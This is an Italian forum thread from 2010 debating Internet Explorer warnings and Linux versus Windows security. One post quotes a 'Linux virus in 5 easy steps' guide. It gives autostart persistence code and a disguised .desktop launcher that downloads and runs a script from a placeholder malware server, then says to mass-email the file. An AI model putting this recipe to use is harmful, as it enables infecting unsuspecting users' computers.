PDA

View Full Version : No a Explorer, c'è la Francia


AntonioBO
19-01-2010, 09:12
BERLINO - Il giallo della minaccia a Internet Explorer continua. Microsoft ha reagito prontamente e ha assicurato che solo le versioni più vecchie del browser più diffuso nel mondo, per esempio la 6, possono essere vulnerabili ad attacchi ostili in ambiente Windows, mentre la versione 8 e quelle più recenti e più diffuse sono sicure. Ma intanto la Certa, un'agenzia governativa francese, si è unita oggi - secondo il sito online dell'autorevole BBC (l'ente radiotelevisivo del Regno Unito) - al monito dell'autorità di controllo tedesca della settimana scorsa, invitando a sua volta gli utenti della rete a non usare Internet Explorer.

La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta. Microsoft Italia avverte, per bocca di Feliciano Intini, che gli attacchi mirati di hacker e altre entità ostili sono stati condotti solo in casi sporadici, e unicamente contro alcune aziende, utilizzando le vulnerabilità di chi usa ancora le versioni più vecchie di internet explorer, come appunto la 6. Nella sola Italia ben 15 milioni di utenti hanno scaricato Internet explorer 8, il cui il filtro smart screen ha consentito di bloccare 275 milioni di attacchi di malware. Microsoft si appella agli utenti: usate il browser, è sicuro, ma usatelo con le massime condizioni possibili di sicurezza. Usate le istruzioni contenute nel SECURITY ADVISER 979352. Il numero uno mondiale del software precisa anche che è impegnato a fondo a risolvere il problema e a proteggere gli utenti, e che interverrà in tempo reale fornendo soluzioni agli utenti ogni qualvolta queste avranno raggiunto un livello qualitativo abbastanza elevato da essere distribuita a tutti.


Internet Explorer 8, ribattono i francesi di Certa, è molto sicuro ma non esiste la garanzia dell'invulnerabilità assoluta. I rischi più seri sono comunque per chi usa IE 6: può entrarti nel computer un "troian" che rende il pirata informatico padrone del tuo pc e gli consente di scaricare e diffondere a tua insaputa dati sensibili. Secondo Graham Cluley, della Sophos, un'azienda britannica specializzata nella sicurezza dei computer, anche IE 8 non è invulnerabile, e occorre un upgrading costante.

Cosa farà allora il popolo internettiano in tutto il pianeta? Con quali browser potrà navigare sentendosi al sicuro, e non come un bagnante che nuota in mare quando sulla spiaggia sventola la bandiera rossa dell'allarme? Il suggerimento di cambiare browser, dice Cliff Evans, è poco valido: anche gli altri prodotti hanno le loro vulnerabilità, magari in altri punti del loro codice, comunque non c'è assolutamente alcuna garanzia che siano più sicuri di quelli di Microsoft. Quindi attenti a non cedere alla tentazione frettolosa di abbandonare subito Microsoft: i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori.
Repubblica


Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria!

trallallero
19-01-2010, 09:23
Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria!
Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux ;)

AntonioBO
19-01-2010, 09:29
Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux ;)

Io sono solo un utente, ma so che è molto più difficile fare danni ad un sistema basato su Linux. Ma tecnicamente non sono preparato eppure uso Linux. Ma era difficile??

Unrue
19-01-2010, 09:43
Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux ;)

Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

AntonioBO
19-01-2010, 09:46
Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Unrue
19-01-2010, 09:50
la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Esatto ;)

trallallero
19-01-2010, 09:54
Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

Che i sistemi Unix-like siano più stabili non è un mistero infatti sono i più usati dal lato server, ma questo non vuol dire che non siano violabili.
I virus/trojan esistono per esigenza di mercato (poter vendere antivirus) e perchè qualcuno vuole farsi i fatti tuoi e spiare i tuoi dati.
Ora, se solo l'1%, ma mettiamo anche il 2%, usa Linux, chi è che si mette a fare un virus/trojan per sistemi Unix-like ? cosa ne guadagna ? spiccioli.
Il s.o. inviolabile non esiste, basta una semplice necessità di mercato che gli hackers un buco lo trovano.

Oh, lo dico da Ubuntu user eh, non da fanatico di Windows ;)

trallallero
19-01-2010, 09:56
la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Questo è vero, ma non significa che non sia possibile creare un virus per Linux.

AntonioBO
19-01-2010, 10:00
Questo è vero, ma non significa che non sia possibile creare un virus per Linux.

E' possibilissimo. Ma fanno molto meno danni. Questo è quello che ho capito, ma non chiedermi il perché in quanto non saprei spiegarlo :D

Unrue
19-01-2010, 10:05
Che i sistemi Unix-like siano più stabili non è un mistero infatti sono i più usati dal lato server, ma questo non vuol dire che non siano violabili.
I virus/trojan esistono per esigenza di mercato (poter vendere antivirus) e perchè qualcuno vuole farsi i fatti tuoi e spiare i tuoi dati.
Ora, se solo l'1%, ma mettiamo anche il 2%, usa Linux, chi è che si mette a fare un virus/trojan per sistemi Unix-like ? cosa ne guadagna ? spiccioli.

Non ho detto che Linux/Unix sia inviolabile, magari lo fosse, ma solo che non è dimostrato che più un sistema è diffuso e più è bacato.( windows in questo caso) E' solo potenzialmente più attaccabile. Ma ne caso di Windows, se viene trovata una falla fino a che Microsoft non ci mette una pezza il buco resta, e a volte è capitato che la patch ritardasse o addirittura arrivasse dopo molto tempo. Su Linux, stai tranquillo che a breve viene tappata, anzi se uno ha competenze, può tapparsela da solo.


Il s.o. inviolabile non esiste, basta una semplice necessità di mercato che gli hackers un buco lo trovano..

In realtà, dovremmo fare una statistica tra il numero di attacchi riusciti e quelli non riusciti verso un sistema. Se un sistema respinge il 99% degli attacchi non mi sento di dire che è insicuro.

trallallero
19-01-2010, 10:09
How to write a Linux virus in 5 easy steps (http://www.geekzone.co.nz/foobar/6229) :D


Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For example, to create the shortcut for KDE, all you need to write in Python is:

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")

For Gnome the Python script instead needs to write a launcher into the proper directory:

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

Writing these autostart entries is probably some of the first action that your malware should perform.

3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.

That was easy, wasn't it?

gugoXX
19-01-2010, 10:52
Io certe cose non le posterei, anche se facili da trovare altrimenti oppure magari non funzionanti.
Che non ci siano sistemi inviolabili lo sanno tutti, e che i malware vengano concentrati sui sistemi piu' diffusi anche.

I problemi dati dai virus che fanno uso di vulnerabilita' di sistemi operativi o software correlati sono molto ridotti.
Il problema piu' grande e' il
"Clicca qui" e gli utenti che lo fanno.
"Apri qui" e gli utenti aprono.
"Scrivi qui i codici della banca" e gli utenti che lo fanno.
E non ci sono sicurezze che tengano.
Fino a una decina d'anni fa i virus erano molto piu' scaltri di oggi, perche il target erano utenti mediamente esperti. Oggi, nella massa, qualche utente ignaro lo si trova.

mixkey
19-01-2010, 10:55
Io certe cose non le posterei, anche se facili da trovare altrimenti oppure magari non funzionanti.
Che non ci siano sistemi inviolabili lo sanno tutti, e che i malware vengano concentrati sui sistemi piu' diffusi anche.

I problemi dati dai virus che fanno uso di vulnerabilita' di sistemi operativi o software correlati sono molto ridotti.
Il problema piu' grande e' il
"Clicca qui" e gli utenti che lo fanno.
"Apri qui" e gli utenti aprono.
"Scrivi qui i codici della banca" e gli utenti che lo fanno.
E non ci sono sicurezze che tengano.
Fino a una decina d'anni fa i virus erano molto piu' scaltri di oggi, perche il target erano utenti mediamente esperti. Oggi, nella massa, qualche utente ignaro lo si trova.

Sara' perche evito i "clicca, apri, scrivi" il motivo per il quale non ho malware sul mio WXP?

das
19-01-2010, 12:08
Sara' perche evito i "clicca, apri, scrivi" il motivo per il quale non ho malware sul mio WXP?

Mi sa di sì. Io uso windows, non ho mai installato un antivirus e di virus nella mia vita ne ho presi solo 2:

- November 17 (per DOS) nei primi anni '90
- Blaster con windows 2000 una decina d'anni fa

Un sacco di gente che conosco ha il pc infognato nonostante abbia comprato il PC con già l'antivirus installato in partenza. Non capisco come facciano.

anonimizzato
19-01-2010, 12:18
Mi sa di sì. Io uso windows, non ho mai installato un antivirus e di virus nella mia vita ne ho presi solo 2:

- November 17 (per DOS) nei primi anni '90
- Blaster con windows 2000 una decina d'anni fa

Un sacco di gente che conosco ha il pc infognato nonostante abbia comprato il PC con già l'antivirus installato in partenza. Non capisco come facciano.

Io mi ricordo di Sasser. :muro:

Main
19-01-2010, 12:26
i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori.
Repubblica


Questa è la parte più divertente dell'articolo

Jabberwock
19-01-2010, 12:33
E' possibilissimo. Ma fanno molto meno danni. Questo è quello che ho capito, ma non chiedermi il perché in quanto non saprei spiegarlo :D

Perche' con Linux non si gira con i diritti a palla (root), cosa che, con Windows, accadeva fino a XP... e che in realta' continua ad accadere, visto che in molti (pseudo?) esperti consigliano di disattivare UAC appena acceso il computer e su 7, AFAIK, il livello di sicurezza e' stato ridotto per non far apparire l'avviso troppo spesso (????? :confused: ?????)!

Poi bisogna anche vedere che s'intende per molti meno danni: magari non ti tira giu' l'OS, ma se il malware pialla la home, per me sono comunque molti danni! :)

tdi150cv
19-01-2010, 12:51
Io sono solo un utente, ma so che è molto più difficile fare danni ad un sistema basato su Linux. Ma tecnicamente non sono preparato eppure uso Linux. Ma era difficile??

effettivamente che l'os alternativo sia meno vulnerabile non ci sono dubbi , pero' il tempo che perdi nell'installare una chiave onda alice su linux è maggiore di quello che impiegheresti con windows a rifare la macchina danneggiata da un virus. (e ho fatto solo un esempio ma ce ne sono di piu' paradossali che mi sono capitati ... prova tu su mandriva , provai con la 10 , a configurare a 1440x900 un monitor acer 19" wide screen senza dover mettere mano al codice di configurazione)
Questo è il problema e cosi' sarà sempre fino a quando anche i produttori hardware non si metteranno in mente di andare oltre ai driver windows.

aeterna
19-01-2010, 12:58
La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta


a me risulta che in informatica la sicurezza assoluta non esista.
e quindi di cosa stanno a parlare?
lo giudicano sicuro, però non gli va bene lo stesso e quindi consigliano di optare per un browser sicuro al 100%... che però non esisterà mai.

mah, mi sembra tanto un attacco politico/economico.

trallallero
19-01-2010, 12:59
effettivamente che l'os alternativo sia meno vulnerabile non ci sono dubbi , pero' il tempo che perdi nell'installare una chiave onda alice su linux è maggiore di quello che impiegheresti con windows a rifare la macchina danneggiata da un virus. (e ho fatto solo un esempio ma ce ne sono di piu' paradossali che mi sono capitati ... prova tu su mandriva , provai con la 10 , a configurare a 1440x900 un monitor acer 19" wide screen senza dover mettere mano al codice di configurazione)
Questo è il problema e cosi' sarà sempre fino a quando anche i produttori hardware non si metteranno in mente di andare oltre ai driver windows.

Ma solo a voi succedono 'ste cose ? :D
Io ho 2 monitor al lavoro di cui uno un piccolo touch panel e lavoro contemporaneamente con entrambi, configurati in 15 secondi con Ubuntu.
Il touch panel volendo, per divertirmi, lo uso anche come mouse.

Non è che hai provato con Mandriva 0.1 versione alfa anno 1980 (d.C. per essere più precisi) ? :asd:

tdi150cv
19-01-2010, 13:37
Ma solo a voi succedono 'ste cose ? :D
Io ho 2 monitor al lavoro di cui uno un piccolo touch panel e lavoro contemporaneamente con entrambi, configurati in 15 secondi con Ubuntu.
Il touch panel volendo, per divertirmi, lo uso anche come mouse.

Non è che hai provato con Mandriva 0.1 versione alfa anno 1980 (d.C. per essere più precisi) ? :asd:

no no era la mandriva 10 con l'acer al1916w e la noia la risolsi bestemmiando per ore nei piu' svariati forum dedicati dove alla fine fui rimandato a smanettare il caro xorg.conf ... Chiaramente oggi il problema sarà stato risolto , ma allora fui costretto a perdere del gran tempo.
E per un sistema operativo che si pavoneggia a valida alternativa questo NON E' CONCEPIBILE !
Ma arriviamo a qualcosa di piu' moderno , moderno si fa per dire perchè onda esiste da anni oramai . Ancora oggi la tua chiavetta alice tim se vuoi farla funzionare devi pregare in aramaico ... cosi' come la maggior parte dei dispositivi esterni. Giusto in questi giorni devo installare una bella chiave wi-fi di marca sconosciuta ai piu' ... mo vediamo quante ore perdero' prima di incazzarmi , tirare un calcio al baracchino , bestemmiare a chi dice che è semplice , etc. etc. etc.

naaaaa ripeto non è tollerabile a mio avviso ...

AntonioBO
19-01-2010, 18:02
Ma solo a voi succedono 'ste cose ? :D
Io ho 2 monitor al lavoro di cui uno un piccolo touch panel e lavoro contemporaneamente con entrambi, configurati in 15 secondi con Ubuntu.
Il touch panel volendo, per divertirmi, lo uso anche come mouse.

Non è che hai provato con Mandriva 0.1 versione alfa anno 1980 (d.C. per essere più precisi) ? :asd:

Comunque Mandriva è in stato di abbandono da come ho potuto constatare confrontandola con le debian based.

AntonioBO
19-01-2010, 18:04
no no era la mandriva 10 con l'acer al1916w e la noia la risolsi bestemmiando per ore nei piu' svariati forum dedicati dove alla fine fui rimandato a smanettare il caro xorg.conf ... Chiaramente oggi il problema sarà stato risolto , ma allora fui costretto a perdere del gran tempo.
E per un sistema operativo che si pavoneggia a valida alternativa questo NON E' CONCEPIBILE !
Ma arriviamo a qualcosa di piu' moderno , moderno si fa per dire perchè onda esiste da anni oramai . Ancora oggi la tua chiavetta alice tim se vuoi farla funzionare devi pregare in aramaico ... cosi' come la maggior parte dei dispositivi esterni. Giusto in questi giorni devo installare una bella chiave wi-fi di marca sconosciuta ai piu' ... mo vediamo quante ore perdero' prima di incazzarmi , tirare un calcio al baracchino , bestemmiare a chi dice che è semplice , etc. etc. etc.

naaaaa ripeto non è tollerabile a mio avviso ...

E dai Mandriva 10. parliamo del 2002 o 2003 una vita ..... da allora i miglioramenti sono stati epocali

edit:ho detto una cavolata, forse mi confondo con mandrake 10.

lunaticgate
19-01-2010, 18:57
effettivamente che l'os alternativo sia meno vulnerabile non ci sono dubbi , pero' il tempo che perdi nell'installare una chiave onda alice su linux è maggiore di quello che impiegheresti con windows a rifare la macchina danneggiata da un virus. (e ho fatto solo un esempio ma ce ne sono di piu' paradossali che mi sono capitati ... prova tu su mandriva , provai con la 10 , a configurare a 1440x900 un monitor acer 19" wide screen senza dover mettere mano al codice di configurazione)
Questo è il problema e cosi' sarà sempre fino a quando anche i produttori hardware non si metteranno in mente di andare oltre ai driver windows.

A me succede l'esatto contrario!
Con linux installo e configuro l'hardware molto più velocemente e senza installare immondizia di driver sul mio pc................ :O

pfinet
19-01-2010, 20:08
L'open source non è un modello di sviluppo piu sicuro, in anni che uso linux ne ho viste di tutti i colori. Basta ricordare qusto caso emblematico:

Una patch mette in ginocchio Debian (http://www.ossblog.it/post/4099/una-patch-mette-in-ginocchio-debian/)

un manteiner di Debian, una delle due distro ritenute piu sicure, ha cancellato due righe di codice a caso da OpenSSH rendendo il sistema estremamante vulnerabile e per DUE ANNI nessuno ha piu controllato il codice e si è accorto del bug.

Alla faccia di quelli che dicono che l'open source è piu sicuro perche è pieno di gente che controlla il codice!
Il fatto che il codice sia disponibile a tutti non significa automaticamente che c'è anche qualcuno che lo controlla, ma anzi sono in pochissimi che lo fanno e la scarsa manodopera volontaria che sta dietro alle distro linux è del tutto insufficiente a controllare le milioni di righe di codice che ci sono.

trallallero
19-01-2010, 20:10
no no era la mandriva 10 con l'acer al1916w e la noia la risolsi bestemmiando per ore nei piu' svariati forum dedicati dove alla fine fui rimandato a smanettare il caro xorg.conf ... Chiaramente oggi il problema sarà stato risolto , ma allora fui costretto a perdere del gran tempo.
E per un sistema operativo che si pavoneggia a valida alternativa questo NON E' CONCEPIBILE !
Ma arriviamo a qualcosa di piu' moderno , moderno si fa per dire perchè onda esiste da anni oramai . Ancora oggi la tua chiavetta alice tim se vuoi farla funzionare devi pregare in aramaico ... cosi' come la maggior parte dei dispositivi esterni. Giusto in questi giorni devo installare una bella chiave wi-fi di marca sconosciuta ai piu' ... mo vediamo quante ore perdero' prima di incazzarmi , tirare un calcio al baracchino , bestemmiare a chi dice che è semplice , etc. etc. etc.

naaaaa ripeto non è tollerabile a mio avviso ...
Scusa eh, ma tu pensi che io abbia avuto la vita facile con l'antenna wi-fi interna del laptop su winxp ? su Ubuntu ha funzionato senza manco chiedermi il driver, su win ho dovuto installarlo da cd. Poi son dovuto andare anche io su internet a cercare e la soluzione visto che andava, non andava, andava, non andava :uh:
Appurato che era l'applicazione della società dell'antenna che faceva schifo (Intel) ho dovuto scrivere uno scriptino a manina che lancia il servizio WZC ottenendo il seguente risultato:
il servizio parte, non parte, parte, non parte, ovvero ho risolto un beneamato cosiddetto.
Questo ti sembra accettabile ? Ah, per la cronaca, tu parli di un s.o. gratuito, io di uno a pagamento ;)

Probabilmente su Seven non succede più così come non succede sulle ultime versioni di Ubuntu che riconoscono praticamente tutto, infatti ti consiglio di provare il live cd Ubuntu, non Mandriva: scarichi il CD, lo masterizzi, lo lanci col boot e non devi installare niente, lo provi direttamente dal CD (ovviamente lentissimo). Così vedi se ti riconosce la chiavetta ... questo Windows se lo sogna.

PS: per sbaglio ho chiuso il tab di FF prima di inviare il messaggio e m'è preso un colpo.
Poi m'è venuto in mente di aver visto un "undo close tab" nei menu di FF e infatti ... m'ha ricaricato la pagina con tutto il mio messaggio illibato! altro che IE!
FF :ave:

pfinet
19-01-2010, 20:41
PS: per sbaglio ho chiuso il tab di FF prima di inviare il messaggio e m'è preso un colpo.
Poi m'è venuto in mente di aver visto un "undo close tab" nei menu di FF e infatti ... m'ha ricaricato la pagina con tutto il mio messaggio illibato! altro che IE!
FF :ave:

è da un po che non usi explorer vero? ;)

Riapri schede chiuse
Visualizza le schede che sono state chiuse dall'avvio di Internet Explorer.
Google
motoblog
ALICE Parole | Sinonimi e contrari

Apri tutte

Riapri ultima sessione di esplorazione

tdi150cv
19-01-2010, 21:17
A me succede l'esatto contrario!
Con linux installo e configuro l'hardware molto più velocemente e senza installare immondizia di driver sul mio pc................ :O

nemmeno se lo vedo ... o sono tutti rincoglioniti da scrivere documenti come questo http://www.azzablog.com/?p=472 oppure siamo tutti bravi a raccontarle !

Eddai su ...

tdi150cv
19-01-2010, 21:18
E dai Mandriva 10. parliamo del 2002 o 2003 una vita ..... da allora i miglioramenti sono stati epocali

edit:ho detto una cavolata, forse mi confondo con mandrake 10.

mandriva 10 è 2007 ... saranno cambiate anche le cose ora su quella distro ma siamo lontani dall'interfaccia user frendly di windows ...

trallallero
19-01-2010, 22:26
è da un po che non usi explorer vero? ;)

Riapri schede chiuse
Visualizza le schede che sono state chiuse dall'avvio di Internet Explorer.
Google
motoblog
ALICE Parole | Sinonimi e contrari

Apri tutte

Riapri ultima sessione di esplorazione
Beh, veramente no, solo qualche anno :D

mandriva 10 è 2007 ... saranno cambiate anche le cose ora su quella distro ma siamo lontani dall'interfaccia user frendly di windows ...
Se per user friendly intendi poter usare il PC con una mano sola e solo 3 dita di quella mano, son d'accordo con te, altrimenti non vedo differenza tra i due ... se ti succede qualcosa, comunque o sei uno smanettone o lo devi portare in assistenza.
Se un programma non trova una dll, ma quante persone della massa Windows sa cos'é una dll ? un file di registro o un servizio da attivare ?

AntonioBO
19-01-2010, 22:40
mandriva 10 è 2007 ... saranno cambiate anche le cose ora su quella distro ma siamo lontani dall'interfaccia user frendly di windows ...

Ti ripeto, Mandriva la trovo pessima, mentre mi sto trovando molto bene con Linux Mint Helena . Non male anche l'italiana Hymera. Ovviamente tutte derivate da Debian o meglio Mint direttamente da Ubuntu e Hymera da Debian.

gugoXX
19-01-2010, 22:45
Questo, questo

http://wiki.huihoo.com/images/4/4d/Linux-china-communism.jpg

Dai dati sembra che non si lamenti nessuno.
Non si vede un problema. Non appena qualcuno si lamenta, sparisce.
Non il problema pero'...

cdimauro
21-01-2010, 08:19
BERLINO - Il giallo della minaccia a Internet Explorer continua. Microsoft ha reagito prontamente e ha assicurato che solo le versioni più vecchie del browser più diffuso nel mondo, per esempio la 6, possono essere vulnerabili ad attacchi ostili in ambiente Windows, mentre la versione 8 e quelle più recenti e più diffuse sono sicure. Ma intanto la Certa, un'agenzia governativa francese, si è unita oggi - secondo il sito online dell'autorevole BBC (l'ente radiotelevisivo del Regno Unito) - al monito dell'autorità di controllo tedesca della settimana scorsa, invitando a sua volta gli utenti della rete a non usare Internet Explorer.

La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta. Microsoft Italia avverte, per bocca di Feliciano Intini, che gli attacchi mirati di hacker e altre entità ostili sono stati condotti solo in casi sporadici, e unicamente contro alcune aziende, utilizzando le vulnerabilità di chi usa ancora le versioni più vecchie di internet explorer, come appunto la 6. Nella sola Italia ben 15 milioni di utenti hanno scaricato Internet explorer 8, il cui il filtro smart screen ha consentito di bloccare 275 milioni di attacchi di malware. Microsoft si appella agli utenti: usate il browser, è sicuro, ma usatelo con le massime condizioni possibili di sicurezza. Usate le istruzioni contenute nel SECURITY ADVISER 979352. Il numero uno mondiale del software precisa anche che è impegnato a fondo a risolvere il problema e a proteggere gli utenti, e che interverrà in tempo reale fornendo soluzioni agli utenti ogni qualvolta queste avranno raggiunto un livello qualitativo abbastanza elevato da essere distribuita a tutti.


Internet Explorer 8, ribattono i francesi di Certa, è molto sicuro ma non esiste la garanzia dell'invulnerabilità assoluta. I rischi più seri sono comunque per chi usa IE 6: può entrarti nel computer un "troian" che rende il pirata informatico padrone del tuo pc e gli consente di scaricare e diffondere a tua insaputa dati sensibili. Secondo Graham Cluley, della Sophos, un'azienda britannica specializzata nella sicurezza dei computer, anche IE 8 non è invulnerabile, e occorre un upgrading costante.

Cosa farà allora il popolo internettiano in tutto il pianeta? Con quali browser potrà navigare sentendosi al sicuro, e non come un bagnante che nuota in mare quando sulla spiaggia sventola la bandiera rossa dell'allarme? Il suggerimento di cambiare browser, dice Cliff Evans, è poco valido: anche gli altri prodotti hanno le loro vulnerabilità, magari in altri punti del loro codice, comunque non c'è assolutamente alcuna garanzia che siano più sicuri di quelli di Microsoft. Quindi attenti a non cedere alla tentazione frettolosa di abbandonare subito Microsoft: i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori.
Repubblica


Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria!
Questi articoli andrebbero letti fino in fondo, che nella parte finale dicono una cosa giustissima e di cui tutti dovrebbero tenere conto.
Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux ;)
Concordo.
Io sono solo un utente, ma so che è molto più difficile fare danni ad un sistema basato su Linux. Ma tecnicamente non sono preparato eppure uso Linux. Ma era difficile??
Sei un utente, affermi che non sei preparato, ma poi dici che "sai" che è più difficile far danni su Linux...
Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..
La filosofia open source non ha dimostrato proprio niente. Se sei al corrente di una dimostrazione formale, fammelo sapere che me la vado a leggete, ma per favore: non tirare fuori la famigerata "legge" di Linus che è soltanto una bufala. :p

Tanto per farti capire che non c'è nulla di "dimostrato", ti faccio un controesempio. Supponiamo che tu abbia due centrali nucleari nei pressi della residenza di George Bush jr. da collegare all'esterno. Supponiamo che entrambe facciano uso di un sistema open source, ma la prima espone tranquillamente il codice, mentre la seconda no, e come unica differenza rispetto alla prima abbia provveduto soltanto a offuscare le scritte che appaiono all'esterno (esempio: invece di Linux Debian 5.02, Apache 2.2, ecc. ecc. si presenti come NonSonoCazziTuoi 1.0 rock stable, NonSonoAncoraCazziTuoi 1.0 rock stable, ecc. e con tutte le altre scritte cambiate e ridotte all'osso).

A questo punto c'è Bin Laden che assolda due gruppi di terroristi con conoscenze praticamente identiche per quanto riguarda le tecnologie informatiche, e affida loro il compito di accedervi e disabilitare il sistema di raffreddamento del nocciolo.

Secondo te quale sarà il gruppo che per primo riuscirà nell'impresa? :D
la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.
Il che non dimostra proprio nulla, perché non tieni conto dei processi di sviluppo ingegneristici e, in generale, delle skill delle persone che ci lavorano.

Lo sai che statisticamente il 15% circa dei bug deriva dalla correzione di altri bug? Lo sai che bug di questo tipo sono più difficili da risolvere, perché il mantainer è convinto che non ce ne siano proprio lì dove ha di recente corretto il codice (e che, quindi, "deve funzionare" perché c'ha già lavorato e conosce il codice)?
Che i sistemi Unix-like siano più stabili non è un mistero infatti sono i più usati dal lato server, ma questo non vuol dire che non siano violabili.
I virus/trojan esistono per esigenza di mercato (poter vendere antivirus) e perchè qualcuno vuole farsi i fatti tuoi e spiare i tuoi dati.
Ora, se solo l'1%, ma mettiamo anche il 2%, usa Linux, chi è che si mette a fare un virus/trojan per sistemi Unix-like ? cosa ne guadagna ? spiccioli.
Il s.o. inviolabile non esiste, basta una semplice necessità di mercato che gli hackers un buco lo trovano.

Oh, lo dico da Ubuntu user eh, non da fanatico di Windows ;)
A parte sulla maggior stabilità sulla quale ci sarebbe di che discutere (ma finiamo sicuramente in un ginepraio. Anzi no: visto che non cominceremmo neppure a causa della mancanza di una definizione oggettiva e rigorosa del concetto di sistema "stabile" :D), concordo su tutto. :cool:
E' possibilissimo. Ma fanno molto meno danni. Questo è quello che ho capito, ma non chiedermi il perché in quanto non saprei spiegarlo :D
